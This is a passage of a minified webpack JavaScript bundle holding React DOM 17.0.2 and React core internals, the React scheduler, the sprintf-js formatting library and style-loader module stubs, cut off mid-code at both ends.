Xs(e,t,n){return(t=Ds(4,null!==e.children?e.children:[],e.key,t)).lanes=n,t.stateNode={containerInfo:e.containerInfo,pendingChildren:null,implementation:e.implementation},t}function Qs(e,t,n){this.tag=t,this.containerInfo=e,this.finishedWork=this.pingCache=this.current=this.pendingChildren=null,this.timeoutHandle=-1,this.pendingContext=this.context=null,this.hydrate=n,this.callbackNode=null,this.callbackPriority=0,this.eventTimes=Ft(0),this.expirationTimes=Ft(-1),this.entangledLanes=this.finishedLanes=this.mutableReadLanes=this.expiredLanes=this.pingedLanes=this.suspendedLanes=this.pendingLanes=0,this.entanglements=Ft(0),this.mutableSourceEagerHydrationData=null}function Js(e,t,n,a){var r=t.current,o=ds(),l=us(r);e:if(n){t:{if(Ke(n=n._reactInternals)!==n||1!==n.tag)throw Error(i(170));var s=n;do{switch(s.tag){case 3:s=s.stateNode.context;break t;case 1:if(vr(s.type)){s=s.stateNode.__reactInternalMemoizedMergedChildContext;break t}}s=s.return}while(null!==s);throw Error(i(171))}if(1===n.tag){var p=n.type;if(vr(p)){n=br(n,p,s);break e}}n=s}else n=ur;return null===t.context?t.context=n:t.pendingContext=n,(t=co(o,l)).payload={element:e},null!==(a=void 0===a?null:a)&&(t.callback=a),uo(r,t),ms(r,l,o),l}function Ys(e){return(e=e.current).child?(e.child.tag,e.child.stateNode):null}function ep(e,t){if(null!==(e=e.memoizedState)&&null!==e.dehydrated){var n=e.retryLane;e.retryLane=0!==n&&n<t?n:t}}function tp(e,t){ep(e,t),(e=e.alternate)&&ep(e,t)}function np(e,t,n){var a=null!=n&&null!=n.hydrationOptions&&n.hydrationOptions.mutableSources||null;if(n=new Qs(e,t,null!=n&&!0===n.hydrate),t=Ds(3,null,null,2===t?7:1===t?3:0),n.current=t,t.stateNode=n,so(t),e[er]=n.current,za(8===e.nodeType?e.parentNode:e),a)for(e=0;e<a.length;e++){var r=(t=a[e])._getVersion;r=r(t._source),null==n.mutableSourceEagerHydrationData?n.mutableSourceEagerHydrationData=[t,r]:n.mutableSourceEagerHydrationData.push(t,r)}this._internalRoot=n}function ap(e){return!(!e||1!==e.nodeType&&9!==e.nodeType&&11!==e.nodeType&&(8!==e.nodeType||" react-mount-point-unstable "!==e.nodeValue))}function rp(e,t,n,a,r){var o=n._reactRootContainer;if(o){var i=o._internalRoot;if("function"==typeof r){var l=r;r=function(){var e=Ys(i);l.call(e)}}Js(t,i,e,r)}else{if(o=n._reactRootContainer=function(e,t){if(t||(t=!(!(t=e?9===e.nodeType?e.documentElement:e.firstChild:null)||1!==t.nodeType||!t.hasAttribute("data-reactroot"))),!t)for(var n;n=e.lastChild;)e.removeChild(n);return new np(e,0,t?{hydrate:!0}:void 0)}(n,a),i=o._internalRoot,"function"==typeof r){var s=r;r=function(){var e=Ys(i);s.call(e)}}bs((function(){Js(t,i,e,r)}))}return Ys(i)}function op(e,t){var n=2<arguments.length&&void 0!==arguments[2]?arguments[2]:null;if(!ap(t))throw Error(i(200));return function(e,t,n){var a=3<arguments.length&&void 0!==arguments[3]?arguments[3]:null;return{$$typeof:k,key:null==a?null:""+a,children:e,containerInfo:t,implementation:n}}(e,t,null,n)}Gl=function(e,t,n){var a=t.lanes;if(null!==e)if(e.memoizedProps!==t.pendingProps||fr.current)Ri=!0;else{if(0==(n&a)){switch(Ri=!1,t.tag){case 3:Gi(t),qo();break;case 5:To(t);break;case 1:vr(t.type)&&xr(t);break;case 4:Bo(t,t.stateNode.containerInfo);break;case 10:a=t.memoizedProps.value;var r=t.type._context;dr(Jr,r._currentValue),r._currentValue=a;break;case 13:if(null!==t.memoizedState)return 0!=(n&t.child.childLanes)?Yi(e,t,n):(dr(Oo,1&Oo.current),null!==(t=rl(e,t,n))?t.sibling:null);dr(Oo,1&Oo.current);break;case 19:if(a=0!=(n&t.childLanes),0!=(64&e.flags)){if(a)return al(e,t,n);t.flags|=64}if(null!==(r=t.memoizedState)&&(r.rendering=null,r.tail=null,r.lastEffect=null),dr(Oo,Oo.current),a)break;return null;case 23:case 24:return t.lanes=0,Wi(e,t,n)}return rl(e,t,n)}Ri=0!=(16384&e.flags)}else Ri=!1;switch(t.lanes=0,t.tag){case 2:if(a=t.type,null!==e&&(e.alternate=null,t.alternate=null,t.flags|=2),e=t.pendingProps,r=gr(t,mr.current),oo(t,n),r=li(null,t,a,e,r,n),t.flags|=1,"object"==typeof r&&null!==r&&"function"==typeof r.render&&void 0===r.$$typeof){if(t.tag=1,t.memoizedState=null,t.updateQueue=null,vr(a)){var o=!0;xr(t)}else o=!1;t.memoizedState=null!==r.state&&void 0!==r.state?r.state:null,so(t);var l=a.getDerivedStateFromProps;"function"==typeof l&&vo(t,a,l,e),r.updater=_o,t.stateNode=r,r._reactInternals=t,yo(t,a,e,n),t=$i(null,t,a,!0,o,n)}else t.tag=0,Oi(null,t,r,n),t=t.child;return t;case 16:r=t.elementType;e:{switch(null!==e&&(e.alternate=null,t.alternate=null,t.flags|=2),e=t.pendingProps,r=(o=r._init)(r._payload),t.type=r,o=t.tag=function(e){if("function"==typeof e)return Is(e)?1:0;if(null!=e){if((e=e.$$typeof)===N)return 11;if(e===z)return 14}return 2}(r),e=Qr(r,e),o){case 0:t=Ii(null,t,r,e,n);break e;case 1:t=Ui(null,t,r,e,n);break e;case 11:t=ji(null,t,r,e,n);break e;case 14:t=Vi(null,t,r,Qr(r.type,e),a,n);break e}throw Error(i(306,r,""))}return t;case 0:return a=t.type,r=t.pendingProps,Ii(e,t,a,r=t.elementType===a?r:Qr(a,r),n);case 1:return a=t.type,r=t.pendingProps,Ui(e,t,a,r=t.elementType===a?r:Qr(a,r),n);case 3:if(Gi(t),a=t.updateQueue,null===e||null===a)throw Error(i(282));if(a=t.pendingProps,r=null!==(r=t.memoizedState)?r.element:null,po(e,t),fo(t,a,null,n),(a=t.memoizedState.element)===r)qo(),t=rl(e,t,n);else{if((o=(r=t.stateNode).hydrate)&&(Fo=qa(t.stateNode.containerInfo.firstChild),Vo=t,o=Wo=!0),o){if(null!=(e=r.mutableSourceEagerHydrationData))for(r=0;r<e.length;r+=2)(o=e[r])._workInProgressVersionPrimary=e[r+1],Ko.push(o);for(n=Lo(t,null,a,n),t.child=n;n;)n.flags=-3&n.flags|1024,n=n.sibling}else Oi(e,t,a,n),qo();t=t.child}return t;case 5:return To(t),null===e&&Uo(t),a=t.type,r=t.pendingProps,o=null!==e?e.memoizedProps:null,l=r.children,Ia(a,r)?l=null:null!==o&&Ia(a,o)&&(t.flags|=16),Di(e,t),Oi(e,t,l,n),t.child;case 6:return null===e&&Uo(t),null;case 13:return Yi(e,t,n);case 4:return Bo(t,t.stateNode.containerInfo),a=t.pendingProps,null===e?t.child=Mo(t,null,a,n):Oi(e,t,a,n),t.child;case 11:return a=t.type,r=t.pendingProps,ji(e,t,a,r=t.elementType===a?r:Qr(a,r),n);case 7:return Oi(e,t,t.pendingProps,n),t.child;case 8:case 12:return Oi(e,t,t.pendingProps.children,n),t.child;case 10:e:{a=t.type._context,r=t.pendingProps,l=t.memoizedProps,o=r.value;var s=t.type._context;if(dr(Jr,s._currentValue),s._currentValue=o,null!==l)if(s=l.value,0==(o=ca(s,o)?0:0|("function"==typeof a._calculateChangedBits?a._calculateChangedBits(s,o):1073741823))){if(l.children===r.children&&!fr.current){t=rl(e,t,n);break e}}else for(null!==(s=t.child)&&(s.return=t);null!==s;){var p=s.dependencies;if(null!==p){l=s.child;for(var c=p.firstContext;null!==c;){if(c.context===a&&0!=(c.observedBits&o)){1===s.tag&&((c=co(-1,n&-n)).tag=2,uo(s,c)),s.lanes|=n,null!==(c=s.alternate)&&(c.lanes|=n),ro(s.return,n),p.lanes|=n;break}c=c.next}}else l=10===s.tag&&s.type===t.type?null:s.child;if(null!==l)l.return=s;else for(l=s;null!==l;){if(l===t){l=null;break}if(null!==(s=l.sibling)){s.return=l.return,l=s;break}l=l.return}s=l}Oi(e,t,r.children,n),t=t.child}return t;case 9:return r=t.type,a=(o=t.pendingProps).children,oo(t,n),a=a(r=io(r,o.unstable_observedBits)),t.flags|=1,Oi(e,t,a,n),t.child;case 14:return o=Qr(r=t.type,t.pendingProps),Vi(e,t,r,o=Qr(r.type,o),a,n);case 15:return Fi(e,t,t.type,t.pendingProps,a,n);case 17:return a=t.type,r=t.pendingProps,r=t.elementType===a?r:Qr(a,r),null!==e&&(e.alternate=null,t.alternate=null,t.flags|=2),t.tag=1,vr(a)?(e=!0,xr(t)):e=!1,oo(t,n),bo(t,a,r),yo(t,a,r,n),$i(null,t,a,!0,e,n);case 19:return al(e,t,n);case 23:case 24:return Wi(e,t,n)}throw Error(i(156,t.tag))},np.prototype.render=function(e){Js(e,this._internalRoot,null,null)},np.prototype.unmount=function(){var e=this._internalRoot,t=e.containerInfo;Js(null,e,null,(function(){t[er]=null}))},et=function(e){13===e.tag&&(ms(e,4,ds()),tp(e,4))},tt=function(e){13===e.tag&&(ms(e,67108864,ds()),tp(e,67108864))},nt=function(e){if(13===e.tag){var t=ds(),n=us(e);ms(e,n,t),tp(e,n)}},at=function(e,t){return t()},Se=function(e,t,n){switch(t){case"input":if(ne(e,n),t=n.name,"radio"===n.type&&null!=t){for(n=e;n.parentNode;)n=n.parentNode;for(n=n.querySelectorAll("input[name="+JSON.stringify(""+t)+'][type="radio"]'),t=0;t<n.length;t++){var a=n[t];if(a!==e&&a.form===e.form){var r=or(a);if(!r)throw Error(i(90));Q(a),ne(a,r)}}}break;case"textarea":pe(e,n);break;case"select":null!=(t=n.value)&&ie(e,!!n.multiple,t,!1)}},ze=ws,Ae=function(e,t,n,a,r){var o=Pl;Pl|=4;try{return $r(98,e.bind(null,t,n,a,r))}finally{0===(Pl=o)&&($l(),qr())}},Be=function(){0==(49&Pl)&&(function(){if(null!==as){var e=as;as=null,e.forEach((function(e){e.expiredLanes|=24&e.pendingLanes,hs(e,Dr())}))}qr()}(),Bs())},He=function(e,t){var n=Pl;Pl|=2;try{return e(t)}finally{0===(Pl=n)&&($l(),qr())}};var ip={Events:[ar,rr,or,Ze,Pe,Bs,{current:!1}]},lp={findFiberByHostInstance:nr,bundleType:0,version:"17.0.2",rendererPackageName:"react-dom"},sp={bundleType:lp.bundleType,version:lp.version,rendererPackageName:lp.rendererPackageName,rendererConfig:lp.rendererConfig,overrideHookState:null,overrideHookStateDeletePath:null,overrideHookStateRenamePath:null,overrideProps:null,overridePropsDeletePath:null,overridePropsRenamePath:null,setSuspenseHandler:null,scheduleUpdate:null,currentDispatcherRef:x.ReactCurrentDispatcher,findHostInstanceByFiber:function(e){return null===(e=Je(e))?null:e.stateNode},findFiberByHostInstance:lp.findFiberByHostInstance||function(){return null},findHostInstancesForRefresh:null,scheduleRefresh:null,scheduleRoot:null,setRefreshHandler:null,getCurrentFiber:null};if("undefined"!=typeof __REACT_DEVTOOLS_GLOBAL_HOOK__){var pp=__REACT_DEVTOOLS_GLOBAL_HOOK__;if(!pp.isDisabled&&pp.supportsFiber)try{kr=pp.inject(sp),Er=pp}catch(he){}}t.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=ip,t.createPortal=op,t.findDOMNode=function(e){if(null==e)return null;if(1===e.nodeType)return e;var t=e._reactInternals;if(void 0===t){if("function"==typeof e.render)throw Error(i(188));throw Error(i(268,Object.keys(e)))}return null===(e=Je(t))?null:e.stateNode},t.flushSync=function(e,t){var n=Pl;if(0!=(48&n))return e(t);Pl|=1;try{if(e)return $r(99,e.bind(null,t))}finally{Pl=n,qr()}},t.hydrate=function(e,t,n){if(!ap(t))throw Error(i(200));return rp(null,e,t,!0,n)},t.render=function(e,t,n){if(!ap(t))throw Error(i(200));return rp(null,e,t,!1,n)},t.unmountComponentAtNode=function(e){if(!ap(e))throw Error(i(40));return!!e._reactRootContainer&&(bs((function(){rp(null,null,e,!1,(function(){e._reactRootContainer=null,e[er]=null}))})),!0)},t.unstable_batchedUpdates=ws,t.unstable_createPortal=function(e,t){return op(e,t,2<arguments.length&&void 0!==arguments[2]?arguments[2]:null)},t.unstable_renderSubtreeIntoContainer=function(e,t,n,a){if(!ap(n))throw Error(i(200));if(null==e||void 0===e._reactInternals)throw Error(i(38));return rp(e,t,n,!1,a)},t.version="17.0.2"},3935:(e,t,n)=>{"use strict";!function e(){if("undefined"!=typeof __REACT_DEVTOOLS_GLOBAL_HOOK__&&"function"==typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE)try{__REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE(e)}catch(e){console.error(e)}}(),e.exports=n(4448)},2408:(e,t,n)=>{"use strict";var a=n(7418),r=60103,o=60106;t.Fragment=60107,t.StrictMode=60108,t.Profiler=60114;var i=60109,l=60110,s=60112;t.Suspense=60113;var p=60115,c=60116;if("function"==typeof Symbol&&Symbol.for){var d=Symbol.for;r=d("react.element"),o=d("react.portal"),t.Fragment=d("react.fragment"),t.StrictMode=d("react.strict_mode"),t.Profiler=d("react.profiler"),i=d("react.provider"),l=d("react.context"),s=d("react.forward_ref"),t.Suspense=d("react.suspense"),p=d("react.memo"),c=d("react.lazy")}var u="function"==typeof Symbol&&Symbol.iterator;function m(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var f={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},h={};function g(e,t,n){this.props=e,this.context=t,this.refs=h,this.updater=n||f}function v(){}function _(e,t,n){this.props=e,this.context=t,this.refs=h,this.updater=n||f}g.prototype.isReactComponent={},g.prototype.setState=function(e,t){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error(m(85));this.updater.enqueueSetState(this,e,t,"setState")},g.prototype.forceUpdate=function(e){this.updater.enqueueForceUpdate(this,e,"forceUpdate")},v.prototype=g.prototype;var w=_.prototype=new v;w.constructor=_,a(w,g.prototype),w.isPureReactComponent=!0;var b={current:null},x=Object.prototype.hasOwnProperty,y={key:!0,ref:!0,__self:!0,__source:!0};function k(e,t,n){var a,o={},i=null,l=null;if(null!=t)for(a in void 0!==t.ref&&(l=t.ref),void 0!==t.key&&(i=""+t.key),t)x.call(t,a)&&!y.hasOwnProperty(a)&&(o[a]=t[a]);var s=arguments.length-2;if(1===s)o.children=n;else if(1<s){for(var p=Array(s),c=0;c<s;c++)p[c]=arguments[c+2];o.children=p}if(e&&e.defaultProps)for(a in s=e.defaultProps)void 0===o[a]&&(o[a]=s[a]);return{$$typeof:r,type:e,key:i,ref:l,props:o,_owner:b.current}}function E(e){return"object"==typeof e&&null!==e&&e.$$typeof===r}var C=/\/+/g;function S(e,t){return"object"==typeof e&&null!==e&&null!=e.key?function(e){var t={"=":"=0",":":"=2"};return"$"+e.replace(/[=:]/g,(function(e){return t[e]}))}(""+e.key):t.toString(36)}function M(e,t,n,a,i){var l=typeof e;"undefined"!==l&&"boolean"!==l||(e=null);var s=!1;if(null===e)s=!0;else switch(l){case"string":case"number":s=!0;break;case"object":switch(e.$$typeof){case r:case o:s=!0}}if(s)return i=i(s=e),e=""===a?"."+S(s,0):a,Array.isArray(i)?(n="",null!=e&&(n=e.replace(C,"$&/")+"/"),M(i,t,n,"",(function(e){return e}))):null!=i&&(E(i)&&(i=function(e,t){return{$$typeof:r,type:e.type,key:t,ref:e.ref,props:e.props,_owner:e._owner}}(i,n+(!i.key||s&&s.key===i.key?"":(""+i.key).replace(C,"$&/")+"/")+e)),t.push(i)),1;if(s=0,a=""===a?".":a+":",Array.isArray(e))for(var p=0;p<e.length;p++){var c=a+S(l=e[p],p);s+=M(l,t,n,c,i)}else if(c=function(e){return null===e||"object"!=typeof e?null:"function"==typeof(e=u&&e[u]||e["@@iterator"])?e:null}(e),"function"==typeof c)for(e=c.call(e),p=0;!(l=e.next()).done;)s+=M(l=l.value,t,n,c=a+S(l,p++),i);else if("object"===l)throw t=""+e,Error(m(31,"[object Object]"===t?"object with keys {"+Object.keys(e).join(", ")+"}":t));return s}function L(e,t,n){if(null==e)return e;var a=[],r=0;return M(e,a,"","",(function(e){return t.call(n,e,r++)})),a}function N(e){if(-1===e._status){var t=e._result;t=t(),e._status=0,e._result=t,t.then((function(t){0===e._status&&(t=t.default,e._status=1,e._result=t)}),(function(t){0===e._status&&(e._status=2,e._result=t)}))}if(1===e._status)return e._result;throw e._result}var Z={current:null};function P(){var e=Z.current;if(null===e)throw Error(m(321));return e}var z={ReactCurrentDispatcher:Z,ReactCurrentBatchConfig:{transition:0},ReactCurrentOwner:b,IsSomeRendererActing:{current:!1},assign:a};t.Children={map:L,forEach:function(e,t,n){L(e,(function(){t.apply(this,arguments)}),n)},count:function(e){var t=0;return L(e,(function(){t++})),t},toArray:function(e){return L(e,(function(e){return e}))||[]},only:function(e){if(!E(e))throw Error(m(143));return e}},t.Component=g,t.PureComponent=_,t.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=z,t.cloneElement=function(e,t,n){if(null==e)throw Error(m(267,e));var o=a({},e.props),i=e.key,l=e.ref,s=e._owner;if(null!=t){if(void 0!==t.ref&&(l=t.ref,s=b.current),void 0!==t.key&&(i=""+t.key),e.type&&e.type.defaultProps)var p=e.type.defaultProps;for(c in t)x.call(t,c)&&!y.hasOwnProperty(c)&&(o[c]=void 0===t[c]&&void 0!==p?p[c]:t[c])}var c=arguments.length-2;if(1===c)o.children=n;else if(1<c){p=Array(c);for(var d=0;d<c;d++)p[d]=arguments[d+2];o.children=p}return{$$typeof:r,type:e.type,key:i,ref:l,props:o,_owner:s}},t.createContext=function(e,t){return void 0===t&&(t=null),(e={$$typeof:l,_calculateChangedBits:t,_currentValue:e,_currentValue2:e,_threadCount:0,Provider:null,Consumer:null}).Provider={$$typeof:i,_context:e},e.Consumer=e},t.createElement=k,t.createFactory=function(e){var t=k.bind(null,e);return t.type=e,t},t.createRef=function(){return{current:null}},t.forwardRef=function(e){return{$$typeof:s,render:e}},t.isValidElement=E,t.lazy=function(e){return{$$typeof:c,_payload:{_status:-1,_result:e},_init:N}},t.memo=function(e,t){return{$$typeof:p,type:e,compare:void 0===t?null:t}},t.useCallback=function(e,t){return P().useCallback(e,t)},t.useContext=function(e,t){return P().useContext(e,t)},t.useDebugValue=function(){},t.useEffect=function(e,t){return P().useEffect(e,t)},t.useImperativeHandle=function(e,t,n){return P().useImperativeHandle(e,t,n)},t.useLayoutEffect=function(e,t){return P().useLayoutEffect(e,t)},t.useMemo=function(e,t){return P().useMemo(e,t)},t.useReducer=function(e,t,n){return P().useReducer(e,t,n)},t.useRef=function(e){return P().useRef(e)},t.useState=function(e){return P().useState(e)},t.version="17.0.2"},7294:(e,t,n)=>{"use strict";e.exports=n(2408)},53:(e,t)=>{"use strict";var n,a,r,o;if("object"==typeof performance&&"function"==typeof performance.now){var i=performance;t.unstable_now=function(){return i.now()}}else{var l=Date,s=l.now();t.unstable_now=function(){return l.now()-s}}if("undefined"==typeof window||"function"!=typeof MessageChannel){var p=null,c=null,d=function(){if(null!==p)try{var e=t.unstable_now();p(!0,e),p=null}catch(e){throw setTimeout(d,0),e}};n=function(e){null!==p?setTimeout(n,0,e):(p=e,setTimeout(d,0))},a=function(e,t){c=setTimeout(e,t)},r=function(){clearTimeout(c)},t.unstable_shouldYield=function(){return!1},o=t.unstable_forceFrameRate=function(){}}else{var u=window.setTimeout,m=window.clearTimeout;if("undefined"!=typeof console){var f=window.cancelAnimationFrame;"function"!=typeof window.requestAnimationFrame&&console.error("This browser doesn't support requestAnimationFrame. Make sure that you load a polyfill in older browsers. https://reactjs.org/link/react-polyfills"),"function"!=typeof f&&console.error("This browser doesn't support cancelAnimationFrame. Make sure that you load a polyfill in older browsers. https://reactjs.org/link/react-polyfills")}var h=!1,g=null,v=-1,_=5,w=0;t.unstable_shouldYield=function(){return t.unstable_now()>=w},o=function(){},t.unstable_forceFrameRate=function(e){0>e||125<e?console.error("forceFrameRate takes a positive int between 0 and 125, forcing frame rates higher than 125 fps is not supported"):_=0<e?Math.floor(1e3/e):5};var b=new MessageChannel,x=b.port2;b.port1.onmessage=function(){if(null!==g){var e=t.unstable_now();w=e+_;try{g(!0,e)?x.postMessage(null):(h=!1,g=null)}catch(e){throw x.postMessage(null),e}}else h=!1},n=function(e){g=e,h||(h=!0,x.postMessage(null))},a=function(e,n){v=u((function(){e(t.unstable_now())}),n)},r=function(){m(v),v=-1}}function y(e,t){var n=e.length;e.push(t);e:for(;;){var a=n-1>>>1,r=e[a];if(!(void 0!==r&&0<C(r,t)))break e;e[a]=t,e[n]=r,n=a}}function k(e){return void 0===(e=e[0])?null:e}function E(e){var t=e[0];if(void 0!==t){var n=e.pop();if(n!==t){e[0]=n;e:for(var a=0,r=e.length;a<r;){var o=2*(a+1)-1,i=e[o],l=o+1,s=e[l];if(void 0!==i&&0>C(i,n))void 0!==s&&0>C(s,i)?(e[a]=s,e[l]=n,a=l):(e[a]=i,e[o]=n,a=o);else{if(!(void 0!==s&&0>C(s,n)))break e;e[a]=s,e[l]=n,a=l}}}return t}return null}function C(e,t){var n=e.sortIndex-t.sortIndex;return 0!==n?n:e.id-t.id}var S=[],M=[],L=1,N=null,Z=3,P=!1,z=!1,A=!1;function B(e){for(var t=k(M);null!==t;){if(null===t.callback)E(M);else{if(!(t.startTime<=e))break;E(M),t.sortIndex=t.expirationTime,y(S,t)}t=k(M)}}function H(e){if(A=!1,B(e),!z)if(null!==k(S))z=!0,n(T);else{var t=k(M);null!==t&&a(H,t.startTime-e)}}function T(e,n){z=!1,A&&(A=!1,r()),P=!0;var o=Z;try{for(B(n),N=k(S);null!==N&&(!(N.expirationTime>n)||e&&!t.unstable_shouldYield());){var i=N.callback;if("function"==typeof i){N.callback=null,Z=N.priorityLevel;var l=i(N.expirationTime<=n);n=t.unstable_now(),"function"==typeof l?N.callback=l:N===k(S)&&E(S),B(n)}else E(S);N=k(S)}if(null!==N)var s=!0;else{var p=k(M);null!==p&&a(H,p.startTime-n),s=!1}return s}finally{N=null,Z=o,P=!1}}var R=o;t.unstable_IdlePriority=5,t.unstable_ImmediatePriority=1,t.unstable_LowPriority=4,t.unstable_NormalPriority=3,t.unstable_Profiling=null,t.unstable_UserBlockingPriority=2,t.unstable_cancelCallback=function(e){e.callback=null},t.unstable_continueExecution=function(){z||P||(z=!0,n(T))},t.unstable_getCurrentPriorityLevel=function(){return Z},t.unstable_getFirstCallbackNode=function(){return k(S)},t.unstable_next=function(e){switch(Z){case 1:case 2:case 3:var t=3;break;default:t=Z}var n=Z;Z=t;try{return e()}finally{Z=n}},t.unstable_pauseExecution=function(){},t.unstable_requestPaint=R,t.unstable_runWithPriority=function(e,t){switch(e){case 1:case 2:case 3:case 4:case 5:break;default:e=3}var n=Z;Z=e;try{return t()}finally{Z=n}},t.unstable_scheduleCallback=function(e,o,i){var l=t.unstable_now();switch(i="object"==typeof i&&null!==i&&"number"==typeof(i=i.delay)&&0<i?l+i:l,e){case 1:var s=-1;break;case 2:s=250;break;case 5:s=1073741823;break;case 4:s=1e4;break;default:s=5e3}return e={id:L++,callback:o,priorityLevel:e,startTime:i,expirationTime:s=i+s,sortIndex:-1},i>l?(e.sortIndex=i,y(M,e),null===k(S)&&e===k(M)&&(A?r():A=!0,a(H,i-l))):(e.sortIndex=s,y(S,e),z||P||(z=!0,n(T))),e},t.unstable_wrapCallback=function(e){var t=Z;return function(){var n=Z;Z=t;try{return e.apply(this,arguments)}finally{Z=n}}}},3840:(e,t,n)=>{"use strict";e.exports=n(53)},8975:(e,t,n)=>{var a;!function(){"use strict";var r={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function o(e){return function(e,t){var n,a,i,l,s,p,c,d,u,m=1,f=e.length,h="";for(a=0;a<f;a++)if("string"==typeof e[a])h+=e[a];else if("object"==typeof e[a]){if((l=e[a]).keys)for(n=t[m],i=0;i<l.keys.length;i++){if(null==n)throw new Error(o('[sprintf] Cannot access property "%s" of undefined value "%s"',l.keys[i],l.keys[i-1]));n=n[l.keys[i]]}else n=l.param_no?t[l.param_no]:t[m++];if(r.not_type.test(l.type)&&r.not_primitive.test(l.type)&&n instanceof Function&&(n=n()),r.numeric_arg.test(l.type)&&"number"!=typeof n&&isNaN(n))throw new TypeError(o("[sprintf] expecting number but found %T",n));switch(r.number.test(l.type)&&(d=n>=0),l.type){case"b":n=parseInt(n,10).toString(2);break;case"c":n=String.fromCharCode(parseInt(n,10));break;case"d":case"i":n=parseInt(n,10);break;case"j":n=JSON.stringify(n,null,l.width?parseInt(l.width):0);break;case"e":n=l.precision?parseFloat(n).toExponential(l.precision):parseFloat(n).toExponential();break;case"f":n=l.precision?parseFloat(n).toFixed(l.precision):parseFloat(n);break;case"g":n=l.precision?String(Number(n.toPrecision(l.precision))):parseFloat(n);break;case"o":n=(parseInt(n,10)>>>0).toString(8);break;case"s":n=String(n),n=l.precision?n.substring(0,l.precision):n;break;case"t":n=String(!!n),n=l.precision?n.substring(0,l.precision):n;break;case"T":n=Object.prototype.toString.call(n).slice(8,-1).toLowerCase(),n=l.precision?n.substring(0,l.precision):n;break;case"u":n=parseInt(n,10)>>>0;break;case"v":n=n.valueOf(),n=l.precision?n.substring(0,l.precision):n;break;case"x":n=(parseInt(n,10)>>>0).toString(16);break;case"X":n=(parseInt(n,10)>>>0).toString(16).toUpperCase()}r.json.test(l.type)?h+=n:(!r.number.test(l.type)||d&&!l.sign?u="":(u=d?"+":"-",n=n.toString().replace(r.sign,"")),p=l.pad_char?"0"===l.pad_char?"0":l.pad_char.charAt(1):" ",c=l.width-(u+n).length,s=l.width&&c>0?p.repeat(c):"",h+=l.align?u+n+s:"0"===p?u+s+n:s+u+n)}return h}(function(e){if(l[e])return l[e];for(var t,n=e,a=[],o=0;n;){if(null!==(t=r.text.exec(n)))a.push(t[0]);else if(null!==(t=r.modulo.exec(n)))a.push("%");else{if(null===(t=r.placeholder.exec(n)))throw new SyntaxError("[sprintf] unexpected placeholder");if(t[2]){o|=1;var i=[],s=t[2],p=[];if(null===(p=r.key.exec(s)))throw new SyntaxError("[sprintf] failed to parse named argument key");for(i.push(p[1]);""!==(s=s.substring(p[0].length));)if(null!==(p=r.key_access.exec(s)))i.push(p[1]);else{if(null===(p=r.index_access.exec(s)))throw new SyntaxError("[sprintf] failed to parse named argument key");i.push(p[1])}t[2]=i}else o|=2;if(3===o)throw new Error("[sprintf] mixing positional and named placeholders is not (yet) supported");a.push({placeholder:t[0],param_no:t[1],keys:t[2],sign:t[3],pad_char:t[4],align:t[5],width:t[6],precision:t[7],type:t[8]})}n=n.substring(t[0].length)}return l[e]=a}(e),arguments)}function i(e,t){return o.apply(null,[e].concat(t||[]))}var l=Object.create(null);"undefined"!=typeof window&&(window.sprintf=o,window.vsprintf=i,void 0===(a=function(){return{sprintf:o,vsprintf:i}}.call(t,n,t,e))||(e.exports=a))}()},6129:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(6511),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},563:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(3038),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},3493:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(725),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},9780:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(5735),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},8350:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(9455),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},8009:(e,t,n)=>{"use strict";var 